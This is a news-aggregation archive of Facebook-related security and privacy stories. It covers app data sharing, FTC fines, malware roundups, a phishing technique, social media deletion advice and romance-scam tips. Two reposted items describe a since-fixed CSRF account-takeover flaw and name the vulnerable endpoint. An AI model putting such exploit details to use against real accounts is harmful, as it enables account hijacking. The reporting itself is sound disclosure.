Category Archives: facebook

Test Shows Facebook Begins Collecting Data From Several Popular Apps Seconds After Users Start Consuming Them. Company Also Collects Data of Non-Facebook Users.

Millions of smartphone users confess their most intimate secrets to apps. Unbeknown to most people, in many cases that data is being shared with someone else: Facebook. [Editor's note: the link may be paywalled; an alternative source was not immediately available.] The Wall Street Journal reports: The social-media giant collects intensely personal information from many popular smartphone apps just seconds after users enter it, even if the user has no connection to Facebook, according to testing done by The Wall Street Journal. The apps often send the data without any prominent or specific disclosure, the testing showed. [...] In the case of apps, the Journal's testing showed that Facebook software collects data from many apps even if no Facebook account is used to log in and if the end user isn't a Facebook member. In the Journal's testing, Instant Heart Rate: HR Monitor, the most popular heart-rate app on Apple's iOS, made by California-based Azumio, sent a user's heart rate to Facebook immediately after it was recorded. Flo Health's Flo Period & Ovulation Tracker, which claims 25 million active users, told Facebook when a user was having her period or informed the app of an intention to get pregnant, the tests showed. Real-estate app Realtor.com, owned by Move, a subsidiary of Wall Street Journal parent News Corp, sent the social network the location and price of listings that a user viewed, noting which ones were marked as favorites, the tests showed. None of those apps provided users any apparent way to stop that information from being sent to Facebook.

Read more of this story at Slashdot.

How to Stop Facebook App From Tracking Your Location In the Background

Every app installed on your smartphone with permission to access location service "can" continually collect your real-time location secretly, even in the background when you do not use them. Do you know? — Installing the Facebook app on your Android and iOS smartphones automatically gives the social media company your rightful consent to collect the history of your precise location. If you

Cyber Security Week in Review (Feb. 22)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • U.S. officials charged a former member of the Air Force with defecting in order to help an Iranian cyber espionage unit. The Department of Justice say the woman collected information on former colleagues, and then the Iranian hackers attempted to target those individuals and install spyware on their computers.
  • The U.S. Department of Justice is dismantling two task forces aimed at protecting American elections. The groups were originally created after the 2016 presidential election to prevent foreign interference but after the 2018 midterms, the Trump administration shrunk their sizes significantly. 
  • Facebook and the U.S. government are closing in on a settlement over several privacy violations. Sources familiar with the discussions say it will likely result in a multimillion-dollar fine, likely to be the largest the Federal Trade Commission has ever imposed on a technology company. 

From Talos


  • There’s been a recent uptick in the Brushaloader infections. While the malware has been around since mid-2018, this new variant makes it more difficult than ever to detect on infected machines. New features include the ability to evade detection in sandboxes and the avoidance of anti-virus protection. 
  • New features in WinDbg makes it easier for researchers to debug malware. A new JavaScript bridge brings WinDbg in line with other modern programs. Cisco Talos walks users through these new features and shows off how to use them. 

Malware roundup


  • Google says it’s stepping up its banning of malicious apps. The company says it’s seen a 66 percent increase in the number of apps its banned from the Google Play store over the past year. Google says it scans more than 50 billion apps a day on users’ phones for malicious activity. 
  • A new campaign using the Separ malware is attempting to steal login credentials at large businesses. The malware uses short scripts and legitimate executable files to avoid detection. 
  • A new ATM malware called "WinPot" turns the machines into "slot machines." This allows hackers to essentially gamify ATM hacking, randomizing how much money the machine dispenses. 

The rest of the news


  • The U.S. is reviving a secret program to carry out supply-chain attacks against Iran. The cyber attacks are targeted at the country’s missile program. Over the past two months, two of Iran’s efforts to launch satellites have failed within minutes, though it’s difficult to assign those failures to the U.S. 
  • Australia says a “sophisticated state actor” carried out a cyber attack on its parliament. The ruling Liberal-National coalition parties say their systems were compromised in the attack. Since then, the country says it’s put “a number of measures” in place to protect its election system. 
  • Cisco released security updates for 15 vulnerabilities. Two critical bugs could allow attackers to gain root access to a system, and a third opens the door for a malicious actor to bypass authentication altogether. 
  • Facebook keeps a list of users that it believes could be a threat to the company or its employees. The database is made up of users who have made threatening posts against the company in the past. 


Former Facebook Employees Say The Company’s Prioritization Of Privacy is About Optics

Last May, Facebook promised to launch a "Clear History" feature that it said would give users more control over their data. 9 months later it's nowhere to be found and now a report claims that it's a key example of the company's "reactionary" way of dealing with privacy concerns. From a report: Thus far, Facebook's public discussions of Clear History appear to have been more about communications strategy than charting a new course. In a Facebook post looking back on 2018, Zuckerberg pointed to the tool as one that would "give people more transparency" while Sandberg highlighted it to show Facebook's willingness to change during a speech at the World Economic Forum in Davos, Switzerland, last month. Still, nine months after its initial announcement, Clear History is nowhere to be found. "We want to make sure this works the way it should for everyone on Facebook, which is taking longer than expected," the company said in a statement to BuzzFeed News. It's unclear if new high-profile hires, like Nate Cardozo (formerly of EFF) and Robyn Greene (formerly of New America's Open Technology Institute), will work with Facebook's new privacy unit or if they will be involved with Clear History. It has reached out to groups like Access Now, the Electronic Frontier Foundation (EFF), and the Center for Democracy and Technology (CDT), as well as academics. Sources confirmed that CDT and EFF were advising Facebook on its Clear History tool, but could not disclose specifics of their meetings due to nondisclosure agreements. Access Now's Masse confirmed Facebook had reached out on a number of issues, including Clear History, in the last few months, but called the conversations "punctual and limited." "Despite repeated statements and apologies from the company, we are not seeing a shift in Facebook data practices or an attitude that would suggest that they take data protection seriously," she said.

Read more of this story at Slashdot.

Facebook Continued To Identify Users Who Are Interested in Nazis — and Then Used the Info To Let Advertisers Target Them, Investigation Finds

An anonymous reader shares a report: Facebook makes money by charging advertisers to reach just the right audience for their message -- even when that audience is made up of people interested in the perpetrators of the Holocaust or explicitly neo-Nazi music. Despite promises of greater oversight following past advertising scandals, a Times review shows that Facebook has continued to allow advertisers to target hundreds of thousands of users the social media firm believes are curious about topics such as "Joseph Goebbels," "Josef Mengele," "Heinrich Himmler," the neo-nazi punk band Skrewdriver and Benito Mussolini's long-defunct National Fascist Party. Experts say that this practice runs counter to the company's stated principles and can help fuel radicalization online. "What you're describing, where a clear hateful idea or narrative can be amplified to reach more people, is exactly what they said they don't want to do and what they need to be held accountable for," said Oren Segal, director of the Anti-Defamation League's center on extremism. After being contacted by The Times, Facebook said that it would remove many of the audience groupings from its ad platform.

Read more of this story at Slashdot.

Facebook’s AI chief suggests working on a new class of semiconductor

Facebook Plans To Develop Its Own Semiconductor Design

Last year, Facebook had revealed its plans to start designing and building its own chips to power it’s AI (artificial intelligence) systems and hardware devices. Basically, the social media giant is looking to develop its semiconductors to lower its dependence on chipmakers like Intel and Qualcomm.

In an interview with The Financial Times on Monday, Facebook’s chief AI scientist said the company is developing a new class of semiconductor that will have different working style in comparison to most of the present designs.

The idea is to develop semiconductors that can better train deep learning algorithms. The chips also will be able to offer faster computing that Facebook needs in order to reach new AI inventions including digital assistants with common sense.

“In terms of new uses, one thing Facebook would be interested in is offering smart digital assistants — something that has a level of common sense,” LeCun told the Financial Times. “They have background knowledge and you can have a discussion with them on any topic.”

LeCun reportedly wants Facebook’s digital assistant to be more like humans and to understand “what will happen when the world responds to [its] interactions with it.”

In order to help human moderators decide what content needs to be kept on Facebook and what needs to be removed, the social media giant reportedly has plans to develop AI chips for the same so that they can monitor content in real time. LeCun also apparently wants to reduce the power consumption of the chips and make them process information much quicker.

Facebook is not the first company that is looking to design its own chips for the AI field. Tech giants like Alphabet Inc.’s Google has developed its own chips to help power its AI systems, search ranking and other features, while Apple Inc. has also launched its own chips to enhance the power and efficiency of its devices.

The post Facebook’s AI chief suggests working on a new class of semiconductor appeared first on TechWorm.

Smashing Security #116: Stalking debtors, Facebook farce, and a cyber insurance snag

Smashing Security #116: Stalking debtors, Facebook farce, and a cyber insurance snag

How would *you* track someone who owed you money? What was the colossal flaw Facebook left on its website for anyone to exploit and hijack accounts? And what excuse are insurance companies giving for not paying victims of the NotPetya malware millions of dollars?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Joe Carrigan of the Information Security Institute at Johns Hopkins University.

Facebook Now Lets Android Users Block Background Collection of Location Data

Facebook has rolled out an update to Android users that gives them a greater degree of control over the sharing of location data with the social network. From a report: Specifically, the update makes it possible to stop Facebook from using tracking your location in the background when you are not using the app. The change brings parity to the iOS and Android Facebook apps. In introducing the new finer-grained controls, Facebook insists that it is "not making any changes to the choices you've previously made nor are we collecting any new information."

Read more of this story at Slashdot.

CSRF vulnerability in Facebook allows attackers to hijack accounts with a single click

Facebook pays $25,000 to security researcher for discovering CSRF exploit that leads to stealing accounts

A security researcher discovered a fatal cross-site request forgery (CSRF) vulnerability that would allow hackers to takeover Facebook accounts by simply forcing the victim to click on the malicious link.

The cybersecurity expert who goes by the pseudonym “Samm0uda” discovered a vulnerability after noticing an exposed endpoint (facebook.com/comet/dialog_DONOTUSE/), which could be exploited to bypass the CSRF protections and perform various actions on behalf of the victim.

“This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and makes a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain www.facebook.com which makes it easier for the attacker to trick his victims to visit the URL,” the researcher says on his blog.

“The vulnerable endpoint is:
https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body).”

The researcher discovered that through the bug it was not only possible to post on the timeline of targeted Facebook users’ accounts, but also delete their profile images and trick them into deleting their accounts. In the latter case, for a successful attack, the attacker will need to force the user to enter his password.

The flaw could have also been exploited to take control of an account using requests that would change the email address or mobile number related to the victim’s account. If an attacker is successful in adding his email address or phone number, he can use the password reset function to set a new password and block the original owner from accessing the account.

This would require some effort on the part of the attacker to exploit the vulnerability, as he will need to force the user to follow two separate links – one to add the email or phone number and another one to confirm it. However, the expert was able to create a single URL link that allowed him to obtain the access token of the victims.

Samm0uda informed about his findings to Facebook on January 26, 2019. The social media giant acknowledged the issue and fixed the problem on January 31, 2019. Facebook awarded a $25,000 bounty to the researcher as part of the company’s bug bounty program.

You can read more about Samm0uda’s findings here.

The post CSRF vulnerability in Facebook allows attackers to hijack accounts with a single click appeared first on TechWorm.

Rietspoof malware distributes ransomware via messaging apps

By Waqas

A malware strain dubbed as Rietspoof has been under the radar of researchers at Avast since last August. Reportedly, researchers suspect that the malware is on the rise and it is being distributed via Skype, Facebook Messenger, and other messaging apps. Researchers maintain that the malware actually is a dropper designed to allow dangerous ransomware to […]

This is a post from HackRead.com Read the original post: Rietspoof malware distributes ransomware via messaging apps

‘Digital Gangster’ Facebook Intentionally and Knowingly Violated UK Privacy and Competition Rules, British Lawmakers Say

British lawmakers on Sunday accused Facebook of having "intentionally and knowingly violated both data privacy and anti-competition laws" in the country, and they called for investigations into the social media giant's business practices. From a report: The sharp rebuke came in a 108-page report written by members of Parliament, who in 2017 began a wide-ranging study of Facebook and the spread of malicious content online. They concluded that the United Kingdom should adopt new regulations so lawmakers can hold Facebook and its tech peers in Silicon Valley accountable for digital misdeeds. "Companies like Facebook should not be allowed to behave like 'digital gangsters' in the online world," U.K. lawmakers said in their report, "considering themselves to be ahead of and beyond the law."

Read more of this story at Slashdot.

Facebook login phishing campaign can deceive tech-savvy users

Security experts at Myki have recently discovered a new phishing campaign that could deceive even most tech-savvy users.

The technique relies upon the concept of being able to reproduce a social login prompt in a very realistic format inside an HTML block.

Crooks are distributing links to blogs and services that display users “login using Facebook account” to read an exclusive article or purchase a discounted product.

The login popup prompt is in HTML and appears very realistic-looking, the status bar, navigation bar, shadows, and content also look exactly like a legitimate login prompt.

When users visit the malicious website, they are prompted to log in with a social account. Once selected a login method, the fake login prompt will be displayed.

The credentials provided by the users are sent to the attacker.

When users click “log in with Facebook” button available on any website, they either get redirected to facebook.com or are served with facebook.com in a new pop-up browser window, asking them to enter their Facebook credentials to authenticate using OAuth and permitting the service to access their profile’s data.

Users can also interact with the fake browser window, drag it where they want or exit it like any legitimate window.

“The only way to protect yourself from this type of attack is to actually try to drag the prompt away from the window it is currently displayed in. If dragging it out fails (part of the popup disappears beyond the edge of the window), it’s a definite sign that the popup is fake.” concludes the experts.

Pierluigi Paganini

(SecurityAffairs – phishing, Facebook)

The post Facebook login phishing campaign can deceive tech-savvy users appeared first on Security Affairs.

Facebook paid $25,000 for CSRF exploit that leads to Account Takeover

Facebook paid a $25,000 bounty for a critical cross-site request forgery (CSRF) vulnerability that could have been exploited to hijack accounts simply by tricking users into clicki on a link.

The white hat hacker who goes online with the moniker “Samm0uda” discovered a critical CSRF vulnerability in Facebook and the social network giant paid a $25,000 bounty.

“This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook which could lead to takeover of victims accounts. In order for this attack to be effective, an attacker would have to trick the target into clicking on a link.” wrote the expert.

The flaw resides in the facebook.com/comet/dialog_DONOTUSE/, the hacker leveraged it to bypass CSRF protections and act on user’s behalf by tricking him into clicking a malicious URL.

“This is possible because of a vulnerable endpoint which takes another given Facebook endpoint selected by the attacker along with the parameters and make a POST request to that endpoint after adding the fb_dtsg parameter. Also this endpoint is located under the main domain www.facebook.com which makes it easier for the attacker to trick his victims to visit the URL.” continues the expert.

“The vulnerable endpoint is: 
https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX where XXXX is the endpoint with parameters where the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body).”

Facebook CSRF

Samm0uda published PoC URLs that could allegedly be exploited to post something on a user’s timeline and delete their profile picture.

The flaw could have been exploited even to delete the account of a targeted user, but in this case, victims have to provide their password before the account is deleted.

The flaw could have also been exploited to take control of an account by using requests that would change the targeted user’s email address or phone number associated with the account. Once the attacker has added his email address or phone number to an account, he can start a password reset.

Of course, to take full control over a Facebook account the attacker could have used the flaw to times, the first time to replace the email address or phone number of the victims, and the second time for confirming the action.

The expert was also able to create a single link that allowed him to obtain the access token of the victims.

Below the timeline of the flaw:

Jan 26, 2019 — Report Sent
Jan 26, 2019—  Acknowledged by Facebook
Jan 28, 2019 —  More details sent
Jan 31, 2019— Fixed by Facebook
Feb 12, 2019 — $25,000  Bounty Awarded by Facebook

Pierluigi Paganini

(SecurityAffairs – CSRF, hacking)


The post Facebook paid $25,000 for CSRF exploit that leads to Account Takeover appeared first on Security Affairs.

Facebook Becomes ‘A Haven For the Anti-Vaccination Movement’

"As a disturbing number of measles outbreaks crop up around the United States, Facebook is facing challenges combating widespread misinformation about vaccinations on its platform," reported the Washington Post Wednesday, saying Facebook "has become a haven for the anti-vaccination movement" and that "the rise of 'anti-vaxx' Facebook groups is overlapping with a resurgence of measles" in the U.S. Facebook has publicly declared that fighting misinformation is one of its top priorities. But when it comes to policing misleading content about vaccinations, the site faces a thorny challenge. The bulk of anti-vaccination content doesn't violate Facebook's community guidelines for inciting "real-world harm," according to a spokesperson, and the site's algorithms often promote unscientific pages or posts about the issue... Wendy Sue Swanson, a pediatrician at Seattle Children's Hospital and spokeswoman for the American Academy of Pediatrics, recently met with Facebook strategists about dealing with public health issues, including misinformation about vaccines, on the platform... "Facebook isn't responsible for changing quacks but they do have an opportunity to change the way information is served up." But Facebook's algorithms often promote anti-vaccination content over widely accepted, scientifically backed posts or pages about vaccinations. A recent investigation from the Guardian found that Facebook search results regarding vaccines were "dominated by anti-vaccination propaganda...." Facebook also accepted advertising revenue from Vax Truther, Anti-Vaxxer, Vaccines Revealed and Michigan for Vaccine Choice, among others, according to another investigation from the Guardian [which found Facebook even offers the ability to target 900,000 users that Facebook has helpfully identified as interested in "vaccine controversies."] Last month YouTube promised to stop recommending videos that "could misinform users in harmful ways," and later told the Guardian that that would include anti-vaccine videos. The Guardian also noted this week that one anti-vaccination group on Facebook has over 150,000 members. But Facebook told the Post Wednesday that by not deleting the pseudoscience, they're actually giving their users an opportunity to speak up on their own and share factual counter-arguments themselves. By Thursday Facebook added that it was "exploring" additional steps, including "reducing or removing this type of content from recommendations, including 'Groups You Should Join,' and demoting it in search results, while also ensuring that higher quality and more authoritative information is available."

Read more of this story at Slashdot.

Facebook could be hit with a record settling multi-billion dollar fine from the FTC for privacy violation

Facebook is negotiating a multi-billion dollar fine with the FTC over privacy probe

Facebook could be slapped a multi-billion dollar fine from the FTC (Federal Trade Commission) over recent privacy lapses, according to a report from The Washington Post. The FTC has been investigating into Facebook’s privacy and security-violating practices related to the leaking of data of Facebook users to Cambridge Analytica last year.

For those unaware, Cambridge Analytica and Facebook were involved in a privacy scandal wherein the former had illegally lifted data of millions of Facebook users without their knowledge and consent and used it to influence voter trends in several countries. Facebook allowed thousands of app developers to harvest data through third-party online games and quizzes and then used it to target American voters with emotionally specific messaging. Facebook believes that as many as 87 million users’ personal data have been collected without their permission.

According to The Washington Post, Facebook and the FTC are negotiating a “multi-billion dollar” fine for the social networking giant’s privacy violations. However, the two sides haven’t agreed on an amount, as Facebook has allegedly disputed some of the FTC’s stipulations, The Washington Post said citing two unnamed sources.

Currently, the issue is whether Facebook is in violation of a 2011 consent agreement with the FTC, which required the social network to have a “comprehensive privacy program” and to get the “express consent” of users before sharing their data.

The fine imposed for privacy lapses on Facebook could be the largest ever for a tech company. Previous largest-ever FTC fines imposed on a tech firm was the $22.5 million penalty that Google was made to pay for violating an earlier privacy agreement with the agency. 

Both Facebook and the FTC have declined to comment on the issue.

The post Facebook could be hit with a record settling multi-billion dollar fine from the FTC for privacy violation appeared first on TechWorm.

Interviews: Ask Social Network Minds.com CEO and Founder Bill Ottman a Question

As you may have noticed, Facebook is not cool anymore. The social juggernaut has been mired in controversies -- infamous privacy scandals or company's ruthless "grow fast and break things" approach to gain users, to name a few. Luckily enough, some people are trying to build new social networks and are coming up with interesting original ideas. Minds.com is one such social network. The open source social network, which has been operational since 2012, works on a point-earning/exchange system to give users full control over the reach of their posts. One of the complaints people have with Facebook and Twitter is that they feel their posts are not being seen by all of their friends. Minds.com lets users earn points and then trade those points to boost their posts on the platform. Users earn tokens by being active on the platform and engaging in uploading, voting, commenting and other similar activities. They can then use these tokens, which can be exchanged within the platform, to boost the reach of their posts. The company last year launched a cryptocurrency reward program based on the ethereum blockchain for all users on the platform. Minds says it does not determine what should be censored. Users are free to post whatever they want. (You can follow us on Minds.) We are excited to announced that Minds founder and chief executive Bill Ottman has agreed to do an interview with us. If you have a question about Minds.com for him or his take on the current social networking space, feel free to ask it in the comments section below.

Read more of this story at Slashdot.

Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
  • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
  • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


Facebook Settlement With FTC Could Run Into the Billions

An anonymous reader quotes a report from The New York Times: Facebook and the Federal Trade Commission are discussing a settlement over privacy violations that could amount to a record, multibillion-dollar fine, according to three people with knowledge of the talks. The company and the F.T.C.'s consumer protection and enforcement staff have been in negotiations over a financial penalty for claims that Facebook violated a 2011 privacy consent decree with the agency, said the people, who spoke on the condition of anonymity because the investigation is private. In 2011, Facebook promised a series of measures to protect user privacy after an investigation found it had harmed consumers with its handling of user data. The current talks have not yet reached the F.T.C.'s five commissioners for a vote and it is unclear how close the two sides are to wrapping up the nearly 11-month investigation. The commissioners met in mid-December and were updated by staff members that they had at that point found considerable evidence of violations of the 2011 consent decree. The FTC investigation into Facebook began after it was reported that the information of 87 million users had been harvested by a British political consulting firm, Cambridge Analytica, without their permission. The agency could seek up to $41,000 for each violation found.

Read more of this story at Slashdot.

Facebook Security Keeps a Detailed ‘Lookout’ List of Threats, Including Users and Former Employees, and Can Track Their Location

An anonymous reader shares a report: In early 2018, a Facebook user made a public threat on the social network against one of the company's offices in Europe. Facebook picked up the threat, pulled the user's data and determined he was in the same country as the office he was targeting. The company informed the authorities about the threat and directed its security officers to be on the lookout for the user. "He made a veiled threat that 'Tomorrow everyone is going to pay' or something to that effect," a former Facebook security employee told CNBC. The incident is representative of the steps Facebook takes to keep its offices, executives and employees protected, according to nine former Facebook employees who spoke with CNBC. The company mines its social network for threatening comments, and in some cases uses its products to track the location of people it believes present a credible threat. Several of the former employees questioned the ethics of Facebook's security strategies, with one of them calling the tactics "very Big Brother-esque." Other former employees argue these security measures are justified by Facebook's reach and the intense emotions it can inspire. The company has 2.7 billion users across its services. That means that if just 0.01 percent of users make a threat, Facebook is still dealing with 270,000 potential security risks. [...] One of the tools Facebook uses to monitor threats is a "be on lookout" or "BOLO" list, which is updated approximately once a week. The list was created in 2008, an early employee in Facebook's physical security group told CNBC. It now contains hundreds of people, according to four former Facebook security employees who have left the company since 2016. Facebook notifies its security professionals anytime a new person is added to the BOLO list, sending out a report that includes information about the person, such as their name, photo, their general location and a short description of why they were added. In recent years, the security team even had a large monitor that displayed the faces of people on the list, according to a photo CNBC has seen and two people familiar, although Facebook says it no longer operates this monitor.

Read more of this story at Slashdot.

Should you delete yourself from social media?

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook experienced a security breach that impacted 50 million accounts, was responsible for a genocide incited using its platform, kept user data it said it deleted, and was caught abusing Apple development apps to test on children. Twitter, meanwhile, has not only been at the butt end of password bugs, hacks, and data breaches, but some could say these days is a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been the recipient of phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the chord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do, even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies. Next, here’s a quick and dirty list of links to follow in order to adjust privacy settings across the top four social networking platforms:

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, either for the purpose of time management, focus, or beating social media addiction. As more and more of our media consumption moves to smart phones, you can leverage several apps that will help you achieve these goals. These include:

Goodbye, top four!

Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.

Facebook

Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.

Twitter

Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.

Instagram

Time to permanent deletion: Immediately!

Snapchat

Time to permanent deletion: 30 days

Google+

Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, here’s what to do:

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the reasons we enjoy social media may also be the reasons why regular consumers should take a beat and consider the benefits.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.

Waiting for Federal Data Privacy Reform? Don’t Hold Your Breath.

Despite a litany of high-profile data breaches, federal action on data privacy is unlikely to go anywhere in 2019 as partisanship and lack of technology literacy complicate Congressional action.

The post Waiting for Federal Data Privacy Reform? Don’t Hold Your Breath. appeared first on The Security Ledger.

Related Stories

A week in security (February 4 – 8)

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

Online Dating ScamsIt’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

A single mom in her late 40s, well-educated, and attractive, Sarah’s teenager had convinced her to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Online Dating Scams

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.Online Dating Scams

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to send any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.Online Dating Scams

